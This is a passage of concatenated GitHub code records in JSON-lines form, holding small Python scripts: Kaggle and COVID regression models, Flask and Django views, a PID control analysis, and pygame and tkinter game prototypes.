parser.parse_args()\n\n 
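# Example invocation (hypothetical paths, shown for illustration only):\n    #   python auto_kw_selection_v2.py data/ keywords.txt -num_kw 5000 -test_ratio 0.5\n    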
main()\n","repo_name":"skesiraju/indic-kws","sub_path":"kaldi_recipes/local/auto_kw_selection_v2.py","file_name":"auto_kw_selection_v2.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11283313990","text":"from flask import render_template, Blueprint, make_response, request\n\nmain = Blueprint('main', __name__)\n\n@main.route(\"/\")\n@main.route(\"/home\")\ndef\thome():\n\tresp = make_response(render_template(\"home.html\"))\n\tresp.set_cookie(\"userID\", \"12345\")\n\n\treturn resp\n\n@main.route(\"/getCookie\")\ndef getCookie():\n\tuserID = request.cookies.get(\"userID\")\n\n\treturn 'user ID is ' + userID\n\n@main.route(\"/delCookie\")\ndef delCookie():\n\tresp = make_response(\"deleting cookie\")\n\tresp.set_cookie(\"userID\", '', expires = 0)\n\n\treturn resp\n\n","repo_name":"sg-kim/python_flask","sub_path":"16_cookie_and_session/cookieAndSession/main/cookie_exercise.py","file_name":"cookie_exercise.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2450284735","text":"#based on the following kernel: https://www.kaggle.com/hyeonho/pca-nusvc-0-95985\n\nimport numpy as np, pandas as pd\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn import svm, neighbors, linear_model, neural_network\nfrom sklearn.svm import NuSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom tqdm import tqdm\n\ntrain = pd.read_csv('../input/train.csv')\ntest = pd.read_csv('../input/test.csv')\n\noof = np.zeros(len(train))\npreds = np.zeros(len(test))\noof_2 = np.zeros(len(train))\npreds_2 = np.zeros(len(test))\ncols = [c for c in train.columns if c not in ['id', 'target', 'wheezy-copper-turtle-magic']]\n\nfor i in range(512):\n train2 = train[train['wheezy-copper-turtle-magic']==i]\n test2 = test[test['wheezy-copper-turtle-magic']==i]\n idx1 = train2.index; idx2 = test2.index\n train2.reset_index(drop=True,inplace=True)\n\n data = pd.concat([pd.DataFrame(train2[cols]), pd.DataFrame(test2[cols])])\n data2 = StandardScaler().fit_transform(PCA(n_components=40, random_state=4).fit_transform(data[cols]))\n train3 = data2[:train2.shape[0]]; test3 = data2[train2.shape[0]:]\n \n # STRATIFIED K FOLD (Using splits=25 scores 0.002 better but is slower)\n skf = StratifiedKFold(n_splits=5, random_state=42)\n for train_index, test_index in skf.split(train2, train2['target']):\n\n clf = NuSVC(probability=True, kernel='poly', degree=4, gamma='auto', random_state=4, nu=0.59, coef0=0.053)\n clf.fit(train3[train_index,:],train2.loc[train_index]['target'])\n oof[idx1[test_index]] = clf.predict_proba(train3[test_index,:])[:,1]\n preds[idx2] += clf.predict_proba(test3)[:,1] / skf.n_splits\n \n clf = neighbors.KNeighborsClassifier(n_neighbors=17, p=2.9)\n clf.fit(train3[train_index,:],train2.loc[train_index]['target'])\n oof_2[idx1[test_index]] = clf.predict_proba(train3[test_index,:])[:,1]\n preds_2[idx2] += clf.predict_proba(test3)[:,1] / skf.n_splits\n \n #if i%15==0: print(i)\n \nprint(roc_auc_score(train['target'], oof))\nprint(roc_auc_score(train['target'], oof_2))\nprint(roc_auc_score(train['target'], 0.8*oof+0.2*oof_2))\nprint(roc_auc_score(train['target'], 0.95*oof+0.05*oof_2))\nprint(roc_auc_score(train['target'], 1.05*oof-0.05*oof_2))\n\nsub = pd.read_csv('../input/sample_submission.csv')\nsub['target'] = 
preds\nsub.to_csv('submission.csv', index=False)\n\nsub['target'] = 0.8*preds+0.2*preds_2\nsub.to_csv('submission_2.csv', index=False)\n\nsub['target'] = 0.95*preds+0.05*preds_2\nsub.to_csv('submission_3.csv', index=False)\n\nsub['target'] = 1.05*preds-0.05*preds_2\nsub.to_csv('submission_4.csv', index=False)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/instant-gratification/Bojan Tunguz/pca-nusvc-knn.py","file_name":"pca-nusvc-knn.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"}
{"seq_id":"27614532645","text":"#!/usr/bin/env python3\n\n# Created by: Trinity Armstrong\n# Created on: November 2019\n# This program calculates the volume of a sphere\n\nimport math\n\n\ndef calculate(radius):\n    # This function calculates the volume of a sphere\n\n    # Process\n    volume = 4/3*math.pi*radius**3\n\n    return volume\n\n\ndef main():\n    # This function gets the radius then outputs the answer\n\n    # Input\n    while True:\n        print(\"\")\n        user_radius = input(\"Enter the radius of your sphere here (cm): \")\n\n        try:\n            user_radius = int(user_radius)\n            volume = calculate(radius=user_radius)\n            # Output\n            print(\"The volume of your sphere is {}cm³.\".format(volume))\n            break\n        except Exception:\n            print(\"\")\n            print(\"Error! Try again.\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Trinity-Armstrong/ICS3U-Assignment6-Python","sub_path":"volume_of_sphere.py","file_name":"volume_of_sphere.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"43193985125","text":"# -- encoding=utf-8 --\nimport os, sys\nsys.path.insert(0, os.path.abspath(os.curdir))\n\nfrom utils.decorator import render_to, login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nimport json\nfrom django.core.paginator import Paginator\nimport logging\nfrom utils.redisclient import rc\nfrom releaseinfo import DETAIL_KEY_PREFIX, STATUS_RESULT_KEY,IP_KEY_PREFIX,MINIONS_SET_KEY, MINIONS_UP_SET_KEY, \\\n    MINIONS_DOWN_SET_KEY\n\nlogger = logging.getLogger('logger_agent')\n\n@login_required\n@render_to('agent/contentDiv.html')\n@csrf_exempt\ndef agent(request):\n    table_fields = [u'IP', u'minion-id', u'Agent安装版本', u'操作系统版本', u'状态最后更新时间', u'Agent状态']\n    ajax_url = u'/agent/list/' \n    return locals()\n\n@login_required\n@csrf_exempt\ndef agent_list(request):\n    '''\n    get agent list.\n    '''\n    data = request.GET\n    # logger.debug(\"#### start request agent status list\")\n    iDisplayLength = int(data.get('iDisplayLength'))\n    iDisplayStart = int(data.get('iDisplayStart'))\n    sEcho = int(data.get('sEcho'))\n    #iColumns = int(request.GET.get('iColumns', 0))\n    # sSearch = data.get('sSearch', None)\n    # iSortCol_0 = int(data.get('iSortCol_0'))\n    # sSortDir_0 = data.get('sSortDir_0')\n    # order_list = [None, None, None, None, None, None]\n    # order_item = order_list[iSortCol_0]\n\n    agent_status = data.get('agent_status','all')\n    agent_ips = data.get('agent_ips','').strip()\n    result={}\n    try:\n        cache = rc.get(STATUS_RESULT_KEY)\n        result = json.loads(cache) if cache else {}\n        if agent_status == 'up':\n            agents = result.get('up')\n        elif agent_status == 'down':\n            agents = result.get('down')\n        else:\n            agents = result.get('down') + result.get('up')\n        final_agents = set()\n        if agent_ips:\n            agent_ips = [ip.strip() for ip in agent_ips.split('\n') if ip and ip.strip()] #input ips.\n            for agent_ip in agent_ips:\n                key=IP_KEY_PREFIX+agent_ip\n                if not rc.exists(key):\n                    continue\n                m_id = rc.get(key)\n                if not rc.sismember(MINIONS_SET_KEY,m_id):\n                    logger.debug(\"{0} is not in redis cache {1}\".format(m_id,MINIONS_SET_KEY))\n                    continue\n                if agent_status == 'all' \\\n                        or (agent_status == 'down' and rc.sismember(MINIONS_DOWN_SET_KEY,m_id)) \\\n                        or (agent_status == 'up' and rc.sismember(MINIONS_UP_SET_KEY,m_id)):\n                    final_agents.add(m_id)\n            agents = list(final_agents)\n        # agents = [agent for agent in agents if not str(agent).startswith(\"syndic\")]\n    except:\n        logger.error(\"error get agentinfo\")\n        import traceback\n        error = traceback.format_exc()\n        logger.error(error)\n        agents = []\n    # first argument: the object to paginate; a list, tuple or QuerySet all work, anything with count() or __len__()\n    # second argument: how many records to show per page\n    p = Paginator(agents, iDisplayLength)\n    total = p.count # total number of records\n    page_range = p.page_range # list of page numbers\n    page = p.page(page_range[iDisplayStart / iDisplayLength])\n    object_list = page.object_list\n\n    sdicts = {}\n    sdicts[\"sEcho\"] = sEcho\n    sdicts[\"iTotalRecords\"] = total\n    sdicts[\"iTotalDisplayRecords\"] = total\n    sdicts[\"aaData\"] = []\n    for obj in object_list:\n        status = 'down' if obj in result.get('down',{}) else 'up'\n        # the fields do not depend on status: whatever is in the cache gets listed.\n        ip = rc.hget(DETAIL_KEY_PREFIX+obj,'ip')\n        salt_version = rc.hget(DETAIL_KEY_PREFIX+obj,'salt_version')\n        os_version = rc.hget(DETAIL_KEY_PREFIX+obj,'os_version')\n        utime = rc.hget(DETAIL_KEY_PREFIX+obj,'ctime')\n        data = [ip, obj, salt_version, os_version, utime, status]\n        sdicts[\"aaData\"].append(data)\n    # logger.debug(\"#### end request agent status list\")\n    return HttpResponse(json.dumps(sdicts, ensure_ascii=False))\n\nfrom django.conf.urls import patterns, url\nurlpatterns = patterns('',\n    url(r'^agent/$', agent, name='agent'),\n    url(r'^agent/list/$', agent_list),\n)","repo_name":"shwinpiocess/works-snail","sub_path":"ujobs/source/ujobs/page/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"19440507592","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sklearn.linear_model\nimport sklearn.neighbors\nimport datetime as dt\nimport scipy.stats as sp\nimport datetime\n\ntarget_date=dt.datetime.today()\n# Load the data\n#data = pd.read_excel(r'C:\\Users\\azorjf\\Downloads\\COVID-19-geographic-disbtribution-worldwide.xlsx')\ndata = pd.read_excel('https://www.ecdc.europa.eu/sites/default/files/documents/COVID-19-geographic-disbtribution-worldwide.xlsx')\n\n#dataSP[\"dateRep\"]=pd.to_datetime(dataSP[\"dateRep\"])\n#dataSP[\"dateRep\"]=dataSP[\"dateRep\"].map(dt.datetime.toordinal)\n\n#Prepare data\nfilterSP=data['countriesAndTerritories']=='Spain' # filter for Spain\nstart_day=target_date - datetime.timedelta(days=7) # keep only the last 7 days for the model\nfilterDateModel=data['dateRep']>=start_day\nfilterDate=data['dateRep']>='2020-03-13'\ndataSP=data[filterSP]\ndataSPmodel=dataSP[filterDateModel]\ndataSP=dataSP[filterDate]\n#dataSP[\"dateRep\"]=pd.to_datetime(dataSP[\"dateRep\"])\n#dataSP[\"Week\"]=zip(*pd.to_datetime(dataSP['dateRep'].isocalendar()[1]))\ntemp=pd.to_datetime(dataSPmodel[\"dateRep\"])\nX=np.c_[temp.map(dt.datetime.toordinal)]\ny=np.c_[dataSPmodel['cases']]\nz=np.c_[dataSPmodel['deaths']]\n\n\n\n\n# Select a linear model\nmodel = sklearn.linear_model.LinearRegression()\nmodelDeaths = sklearn.linear_model.LinearRegression()\n#model=sklearn.neighbors.KNeighborsRegressor(n_neighbors=3)\n\n# Train the model    model.fit( X, y)\nmodel.fit(X,y)\nmodelDeaths.fit(X,z)\n\n
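# Note (added illustration): LinearRegression cannot consume datetimes directly,\n# so the dates were mapped to ordinal day numbers above; predictions below\n# likewise feed in ordinals, e.g. model.predict([[some_date.toordinal()]])\n# (some_date being a hypothetical datetime.date).\n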
listaY=[]\nfor dias_prediccion in range (1,7):\n    aux=(target_date+datetime.timedelta(days=dias_prediccion)).toordinal()\n    listaY.append([datetime.datetime.fromordinal(aux),model.predict([[aux]])[0][0],modelDeaths.predict([[aux]])[0][0]])\n\ndfgraphic=pd.DataFrame(listaY,columns=['dateRep','cases','deaths'])\nprint(dfgraphic)\n\nframes=[dataSP,dfgraphic]\nresult=pd.concat(frames,axis=0,join='outer',sort=True)\nprint(result.head())\n#Visualize the data\nax=plt.gca() #get current axis\nresult.plot(kind='line',x='dateRep',y='cases',ax=ax)\nresult.plot(kind='line',x='dateRep',y='deaths', color='red',ax=ax)\nplt.savefig('output.png')\nplt.show()\n#print(model.corr())\nfilename='Covid19'+target_date.strftime(\"%Y%m%d%H%M%S\")\nresult.to_excel(filename+'.xlsx', index = False)\n\n","repo_name":"frajuas/TestPython1","sub_path":"mensaje.py","file_name":"mensaje.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"5714118289","text":"while True:\n\tline = int(input())\n\tif line == 0:\n\t\tbreak\n\n\tpost = [] \n\tfor i in range(line):\n\t\tpost.append(input())\n\n\tindex = 0\n\tfor line in post:\n\t\tisPresent = False \n\t\tfor char in range(index, len(line)):\n\t\t\tif line[char] == ' ':\n\t\t\t\tindex = char\n\t\t\t\tisPresent = True\n\t\t\t\tbreak\n\t\t\tif isPresent == False:\n\t\t\t\tif index < len(line):\n\t\t\t\t\tindex = len(line)\n\tprint (index+1)\n","repo_name":"zmrdltl/problemSolving","sub_path":"boj/string/9494.py","file_name":"9494.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"}
{"seq_id":"38036219477","text":"# -*- coding: utf-8 -*-\n# use python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import *\n# import math\nfrom scipy.signal import lti, bode, lsim, TransferFunction, step, step2\nfrom scipy.signal import cont2discrete, dbode\nfrom tc_udemm import sympy_to_lti, lti_to_sympy\n\n\"\"\"\n        First Midterm Exam, Control Theory\n        2019\n\"\"\"\n\n\n###########################################\n# Determine the plant from the given data #\n###########################################\npsi = 0.25\nwn = 4\nvfinal = 2\nDuty = 1    # assumed step amplitude (the snippet references Duty without defining it)\n\n# Plant equation\ns = Symbol('s')\n\nplanta = (wn**2 * vfinal) / (s**2 + 2 * psi * wn * s + wn**2)\n\nPlant_out_sim = planta.simplify()\nprint ('Plant_out: ')\nprint (Plant_out_sim)\n\n#####################################################\n# From here on I use the zeros and poles from sympy #\n#####################################################\nplanta = sympy_to_lti(Plant_out_sim)\nprint (\"planta con sympy:\")\nprint (planta)\n\n\n####################################################\n# Step response of the plant for the proposed duty #\n####################################################\nt = np.linspace(0, 0.2, num=2000)\nu = np.ones(t.size) * Duty\nt, y, x = lsim(planta, T=t, U=u)\n\nfig, ax = plt.subplots()\nax.set_title('Respuesta escalon Close Loop')\nax.set_ylabel('Vout')\nax.set_xlabel('Tiempo [s]')\nax.grid()\nax.plot(t, y)\n\nplt.tight_layout()\nplt.show()\n\n###################################\n# Frequency response of the plant #\n###################################\nfreq = np.arange(1, 100000, 1)\nw, mag, phase = bode(planta, freq)\n\nfig, (ax1, ax2) = plt.subplots(2,1)\nax1.semilogx (w/(2*np.pi), mag, 'b-', linewidth=\"1\")\nax1.set_title('Plant Tf - Magnitude')\n\nax2.semilogx (w/(2*np.pi), phase, 'r-', linewidth=\"1\")\nax2.set_title('Phase')\n\nplt.tight_layout()\nplt.show()\n\n\n\"\"\" \n    Analog PID\n    Full PID Tf = Kp + Ki/s + s Kd     Tf = 1/s * (s**2 Kd + s Kp + Ki)\n    hard to analyze directly: basically a pole at the origin plus two zeros,\n    and depending on the chosen parameters the two zeros may end up complex conjugates\n\n    with only PI we get Tf = 1/s * Kp * (s + Ki/Kp)\n    that is a pole at the origin w = 1; a zero at w = Ki/Kp; gain Kp\n\n    with only PD we get Tf = Kd * (s + Kp/Kd)\n    that is a zero at w = Kp/Kd and gain Kd\n    (or is the gain Kp??)\n\n    Conclusion:\n    choose Kp for the mid-band gain, e.g. 0dB Kp = 1\n    choose the first zero, e.g. 15.9Hz, Ki = 100\n    choose the second zero, e.g. 1590Hz, Kd = 0.0001\n\"\"\"\n##############\n# Analog PID #\n##############\nkp = 1\nki = 10\nzero_d = 250\nw_d = 2 * np.pi * zero_d\nkd = kp / w_d\nnew_pole = 6.28 * 2630\n# new_pole = 0\n\nif new_pole != 0:\n    Pid_out = (kp + ki/s + s*kd) * (new_pole / (s + new_pole))\nelse:\n    Pid_out = (kp + ki/s + s*kd)\n\nPid_out_sim = Pid_out.simplify()\n\nprint ('Pid_out: ')\nprint (Pid_out_sim)\n\n#################################################\n# Bode plot with the poles and zeros from sympy #\n#################################################\npid = sympy_to_lti(Pid_out_sim)\nprint (\"PID con sympy:\")\nprint (pid)\n\nfreq = np.arange(1, 1000000, 1)\n\nw, mag, phase = bode(pid, freq)\n\nfig, (ax1, ax2) = plt.subplots(2,1)\nax1.semilogx (w/(2*np.pi), mag, 'b-', linewidth=\"1\")\nax1.set_title('PID Tf - Magnitude')\n\nax2.semilogx (w/(2*np.pi), phase, 'r-', linewidth=\"1\")\nax2.set_title('Phase')\n\nplt.tight_layout()\nplt.show()\n\n#################################################################\n# Multiply the transfer functions for open loop and close loop  #\n#################################################################\nc = lti_to_sympy(pid)\np = lti_to_sympy(planta)\n\nol = c * p\ncl = ol/(1+ol)\n\nopen_loop = sympy_to_lti(ol)\nopen_loop = TransferFunction(open_loop.num, open_loop.den)    # normalize ol\nclose_loop = sympy_to_lti(cl)\nclose_loop = TransferFunction(close_loop.num, close_loop.den)    # normalize cl\n\nw, mag_ol, phase_ol = bode(open_loop, freq)\nw, mag_cl, phase_cl = bode(close_loop, freq)\n\n\nfig, (ax1, ax2) = plt.subplots(2,1)\nax1.semilogx(w/(2*np.pi), mag_ol, 'b')\nax1.semilogx(w/(2*np.pi), mag_cl, 'y')\nax1.set_title('Analog OpenLoop Blue, CloseLoop Yellow')\nax1.set_ylabel('Amplitude P D2 [dB]', color='b')\nax1.set_xlabel('Frequency [Hz]')\nax1.set_ylim([-40, 40])\n\nax2.semilogx(w/(2*np.pi), phase_ol, 'b')\nax2.semilogx(w/(2*np.pi), phase_cl, 'y')\nax2.set_ylabel('Phase', color='r')\nax2.set_xlabel('Frequency [Hz]')\n\nplt.tight_layout()\nplt.show()\n\n
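# Sanity check (added illustration): with psi = 0.25 the plant alone would\n# overshoot a step by roughly exp(-pi*psi/sqrt(1-psi**2)) ~= 44 %; the closed-loop\n# step response below shows how much the PID changes that.\n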
window\npygame.init()\nscreen = pygame.display.set_mode((800,600))\n\n# Title and Icon\npygame.display.set_caption(\"Space Invaders\")\nicon = pygame.image.load('spaceship.png')\npygame.display.set_icon(icon)\n\n# player\nplayerImg = pygame.image.load('player.png')\nplayX = 370\nplayY = 480\n\ndef player():\n    screen.blit(playerImg,(playX,playY))\n\n\n# Game loop\nrunning = True\nwhile running:\n\n    #RGB\n    screen.fill((0 , 0 , 0))\n\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n\n\n    player()\n    pygame.display.update()\n","repo_name":"rish742/All_Programs","sub_path":"PyGame/SpaceInvader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"39714281698","text":"import logging\nimport os\nimport utils\nfrom utils.downloadWord2vec import download_word2vec_newspaper\nfrom utils.prepareData import _return_stopword_removed_dataframe, _train_test_split\nfrom utils.weightedTfIdfVectorizer import TfIdfEmbeddingVectorizer\nfrom torch.utils.data import DataLoader\n\nfrom model.siameseDataset import SiameseDataset\nfrom model.siameseNetwork import SiameseNetwork\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\ntorch.manual_seed(42)\nnp.random.seed(42)\n\ndef main():\n\timport argparse\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('input_size', type=int)\n\tparser.add_argument('hidden_size', type=int)\n\tparser.add_argument('num_layers', type=int)\n\tparser.add_argument('dropout', type=float)\n\tparser.add_argument('num_classes', type=int)\n\tparser.add_argument('bidirectional', type=bool)\n\tparser.add_argument('batch_size', type=int)\n\tparser.add_argument('epoch', type=int)\n\n\targs = parser.parse_args()\n\ttrain(args)  # the original parsed the args but never started training\n\n\ndef train(args):\n\tword2vec = download_word2vec_newspaper()\n\tdf = _return_stopword_removed_dataframe()  # the call parentheses were missing in the original\n\ttrain_df, test_df = _train_test_split(df)\n\tdocuments = df['question1_without_stopword'].tolist() + df['question2_without_stopword'].tolist()\n\n\ttfidfVectorizer = TfIdfEmbeddingVectorizer()\n\ttfidfVectorizer.fit(documents)\n\ttrain_dataset = SiameseDataset(train_df, tfidfVectorizer)\n\ttest_dataset = SiameseDataset(test_df, tfidfVectorizer)\n\n\ttrain_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\n\ttest_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True)\n\n\n\tmodel = SiameseNetwork(\n\t\tinput_size=args.input_size,\n\t\thidden_size=args.hidden_size,\n\t\tnum_layers=args.num_layers,\n\t\tdropout=args.dropout,\n\t\tnum_classes=args.num_classes,\n\t\tbidirectional=args.bidirectional\n\t)\n\n\n\tloss_fn = torch.nn.NLLLoss()  # was torch.nn.NLLoss(), which does not exist\n\toptimizer = optim.Adam(model.parameters(), lr=0.0001)\n\t\n\n\n\tfor epoch in range(args.epoch):\n\t\tcur_loss = 0.0\n\t\tval_loss = 0.0\n\t\tcur_acc = 0.0\n\t\ttotal = 0\n\t\tmodel.train()\n\t\tfor idx, data in enumerate(train_dataloader):\n\t\t\tq1, q2, label = data\n\t\t\toptimizer.zero_grad()\n\t\t\toutputs = model(q1, q2)\n\t\t\tloss = loss_fn(outputs, label)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tcur_loss += loss.item()  # was loss.itm()\n\t\t\n\t\twith torch.no_grad():\n\t\t\tmodel.eval()\n\t\t\tfor _, data in enumerate(test_dataloader):\n\t\t\t\tq1, q2, label = data\n\t\t\t\toutputs = model(q1, q2)\n\t\t\t\tloss = loss_fn(outputs, label)\n\t\t\t\t_, pred = torch.max(outputs, 1)\n\t\t\t\tval_loss += loss.item()\n\t\t\t\tcur_acc += (pred == label).sum().item()\n\t\t\t\ttotal += outputs.size(0)\n\n\t\tacc = cur_acc * 100 / total\n\t\tprint('Epoch {}:\\t Acc {}'.format(epoch, acc))\n\n\t\t\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n","repo_name":"JiHunWang/quora-question-similarity-kaggle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"1942611795","text":"import sys,time,os,json,datetime,operator\n\n#SELECT * FROM cddata WHERE Date > 2019-01-01 and Date < 2019-01-20\nnew_file = ''\nfor root,dirs, files in os.walk('data'):\n    #print(root,dirs,files)\n    path = root.split(os.sep)\n    for fn in files:\n        fp = root+os.sep+fn\n        #print(fp)\n        f_2 = open(fp, 'r')\n        for line in f_2:\n            data = json.loads(line)\n            payload = data['payload']\n            payload = json.loads(payload)\n#            print(payload['received'])\n            k = payload['received'].split('T')[0]\n            #print (k)\n            if k > '2019-01-01' and k < '2019-01-20':\n                new_file += line\n\n\nwith open('output.txt','wt') as w:\n    w.write(new_file)\n","repo_name":"dingdongdong1992/dateFilter","sub_path":"datefilter.py","file_name":"datefilter.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"71123250401","text":"from django.shortcuts import render_to_response\nfrom activity.models import Activity, act_allow_group\nfrom activity.forms import ActivityForm\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core import serializers\nfrom django.core.context_processors import csrf\nfrom group.models import Group as Grp\nfrom django.contrib.auth.models import Group, User\nfrom django import forms\nimport datetime\n\ndef write_act(request):\n    if request.method == 'POST':\n        form = ActivityForm(request.POST, request.FILES)\n        if form.is_valid():\n            # activity\n            n = form.save(commit = False)\n            n.write_date = datetime.datetime.now()\n            n.save()\n            #the line below should be uncommented when user is added\n            #n.writer_id = request.user.id\n\n\n            # allow_group\n            # to be done\n            return HttpResponseRedirect('/write/')\n    else:\n        form = ActivityForm()\n    return render_to_response('pushact.html', {'form': form})\n\ndef activity(request, typeOrGroup, name):\n    if request.method == 'POST':\n        # using filter form, still need modification for js\n        current_num = int(request.POST['aaa'])\n        new = activityFilterForm(request.POST) # is this line right?\n        if new.is_valid():\n            new.acFilter()\n            json = serializers.serialize('json', new.ac[current_num:current_num+4])\n            return HttpResponse(json)\n        else:\n            return HttpResponse('The post data is not valid!')\n    else:\n        ac = activityFilterForm()\n\n        ac.full_clean()\n        if typeOrGroup == 'type':\n            ac.typeFilter(name)\n        elif typeOrGroup == 'group':\n            #need to check permission for seek\n            ac.groupFilter(name)\n        ac.acFilter()\n        return render_to_response('actlist.html', {'activities': ac.ac[:6]})\n\nclass activityFilterForm(forms.Form):\n    aaa = forms.IntegerField(required = False)\n    ac = Activity.objects.all()\n\n    type = forms.CharField(label='type', max_length=20, required = False)\n    group = forms.CharField(label='group', max_length=20, required = False)\n    seek = forms.BooleanField(required = False)\n\n    title = forms.CharField(label='title', max_length=30, required = False)\n\n    def acFilter(self):\n        if 'type' in self.data:\n            self.ac = self.ac.filter(type = self.cleaned_data['type'])\n        if 'group' in self.data:\n            self.ac = self.ac.filter(group = self.cleaned_data['group'])\n        if 'seek' not in self.data: # do not include activities already due\n            self.ac = self.ac.filter(due_date__gte = datetime.datetime.now()) # filter() returns a new queryset; the original discarded it\n\n        if 'title' in self.data: # search title\n            self.ac = self.ac.filter(title__icontains = self.cleaned_data['title'])\n\n        self.ac = self.ac.order_by('-write_date')\n\n        # may add group filter to obtain seeked or unseeked activities for different groups\n\n    def typeFilter(self, type):\n        self.ac = self.ac.filter(type = type)\n\n    def groupFilter(self, group):\n        self.ac = self.ac.filter(group = group)\n\n\n\ndef activity_page(request, ID):\n    # need to check permission if private\n    activity = Activity.objects.get(id=ID)\n    return render_to_response('actcontent.html', {'activity': activity})\n\n\n","repo_name":"Clause321/JIplatform","sub_path":"activity/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"18539761153","text":"'''\n3. (Convert feet into meters) Write a program that reads a number in feet, converts it\nto meters, and displays the result. One foot is 0.305 meters.\n\n'''\n\n# Getting feet value from the user\nfeet = eval(input(\"Enter a value for feet:\"))\n\n# Converting feet to meters\nmeters = feet * 0.305\n\n# Displaying Result (using formatting)\nprint(\"{} Feet is {} Meters\".format(feet, meters))","repo_name":"musawakiliML/Python-Exercises","sub_path":"Introduction to Programming using Python/Chapter 2/Ex2.3.py","file_name":"Ex2.3.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"74217364642","text":"import tkinter as tk\n\n# renaming the process header name\napp = tk.Tk(className=' Battleships')\n\n# classifying the elements\nleftFrame = tk.Frame(app)\nrightFrame = tk.Frame(app)\nbottomLabel = tk.Label(app, text=\"Welcome to the game, Click something\")\n\n# defining the game area\nleftFrame.grid(row=0, column=0, padx=(10, 20), pady=10, ipady=0)\nrightFrame.grid(row=0, column=1, padx=(20, 10), pady=10, ipady=0)\nbottomLabel.grid(row=1, column=0, columnspan=2, padx=0, pady=(0, 10), ipadx=0)\n\n# ship location test\npship = {\"ship1\": [[1], [1]],\n         \"ship2\": [[2, 2], [2, 3]],\n         \"ship3\": [[6, 7, 8], [3, 3, 3]],\n         \"ship4\": [[5, 5, 5, 5], [6, 7, 8, 9]],\n         \"ship5\": [[6, 7, 8, 9, 10], [8, 8, 8, 8, 8]]}\n\n\n# Logic check\ndef click(row, col, table):\n    row = row + 1\n    col = col + 1\n    xukai = False\n    for i in range(5):\n        if xukai:\n            break\n        else:\n            for k in range(5):\n                try:\n                    if row == pship.get(\"ship%s\" % (i + 1))[0][k] and col == pship.get(\"ship%s\" % (i + 1))[1][k]:\n                        print(\"Hit ship%s at \" % (i + 1), pship.get(\"ship%s\" % (i + 1))[0][k], pship.get(\"ship%s\" % (i + 1))[1][k])\n                        xlocation = pship.get(\"ship%s\" % (i + 1))[0][k]\n                        ylocation = pship.get(\"ship%s\" % (i + 1))[1][k]\n                        bottomLabel.configure(text=\"Hit ship%s at %s %s\" % (i + 1, xlocation, ylocation))\n                        xukai = True\n                        break\n                except IndexError:\n                    bottomLabel.configure(text=\"You clicked row %s column %s on the %s table\" % (row, col, table))\n            else:\n                print('boo')\n                bottomLabel.configure(text=\"You clicked row %s column %s on the %s table\" % (row, col, table))\n\n\n# spawning of the buttons\nfor x in range(10):\n    for y in range(10):\n        lbuttons = tk.Button(leftFrame, text=\"%s\" % 'x', command=lambda row=x, col=y, table=\"Left\": click(row, col, table))\n        rbuttons = tk.Button(rightFrame, text=\"%s\" % 
